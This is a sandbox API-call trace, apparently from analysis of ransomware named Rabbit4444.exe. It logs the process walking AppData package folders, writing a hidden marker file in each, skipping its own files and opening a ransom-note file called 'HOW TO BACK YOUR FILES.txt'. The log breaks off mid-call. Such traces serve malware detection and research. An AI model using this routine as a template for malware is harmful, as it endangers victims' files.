[0066.811] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp\\" [0066.811] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0066.811] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.812] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.815] FlushFileBuffers (hFile=0x228) returned 1 [0066.815] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.815] CloseHandle (hObject=0x228) returned 1 [0066.816] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp") returned 99 [0066.816] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.816] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf125d309, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0066.816] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.816] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.816] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.816] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.816] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf125d309, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.816] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.816] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.816] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.816] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.816] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.816] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf125d309, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf125d309, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf125d309, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.817] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.817] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.817] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf125d309, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf125d309, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf125d309, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.817] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0066.817] lstrcpyW (in: lpString1=0x130ec00, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.818] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.818] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.818] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.818] CloseHandle (hObject=0x27c) returned 1 [0066.818] CloseHandle (hObject=0x228) returned 1 [0066.818] GetCurrentThreadId () returned 0xd98 [0066.818] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0066.818] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory" [0066.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bea8 | out: hHeap=0xe0000) returned 1 [0066.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0066.818] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory" [0066.818] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory\\" [0066.818] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0066.819] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.819] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.823] FlushFileBuffers (hFile=0x228) returned 1 [0066.823] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.824] CloseHandle (hObject=0x228) returned 1 [0066.824] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory") returned 106 [0066.824] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.824] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf125d309, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0066.824] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.824] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.824] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.824] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.824] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf125d309, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.824] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.824] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.824] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.825] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.825] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.825] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf125d309, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf125d309, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1283591, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.825] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.825] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.825] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf125d309, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf125d309, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1283591, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.825] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0066.825] lstrcpyW (in: lpString1=0x130ec0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.825] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.825] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.825] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.826] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.826] CloseHandle (hObject=0x27c) returned 1 [0066.826] CloseHandle (hObject=0x228) returned 1 [0066.826] GetCurrentThreadId () returned 0xd98 [0066.826] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0066.826] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies" [0066.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bce8 | out: hHeap=0xe0000) returned 1 [0066.826] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0066.826] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies" [0066.826] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies\\" [0066.826] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0066.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.827] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.830] FlushFileBuffers (hFile=0x228) returned 1 [0066.831] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.831] CloseHandle (hObject=0x228) returned 1 [0066.831] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies") returned 106 [0066.831] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.831] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1283591, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0066.832] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.832] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.832] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.832] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.832] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7544fabf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7544fabf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1283591, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.832] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.832] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.832] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.832] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.832] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.832] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1283591, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1283591, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1283591, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.832] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.832] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.832] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1283591, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1283591, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1283591, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.832] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0066.832] lstrcpyW (in: lpString1=0x130ec0e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.832] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.833] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.842] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.843] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.843] CloseHandle (hObject=0x27c) returned 1 [0066.843] CloseHandle (hObject=0x228) returned 1 [0066.843] GetCurrentThreadId () returned 0xd98 [0066.843] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11ce48 [0066.843] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy" [0066.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11dab8 | out: hHeap=0xe0000) returned 1 [0066.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ce40 | out: hHeap=0xe0000) returned 1 [0066.843] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy" [0066.843] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\" [0066.843] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0066.843] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.849] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.851] FlushFileBuffers 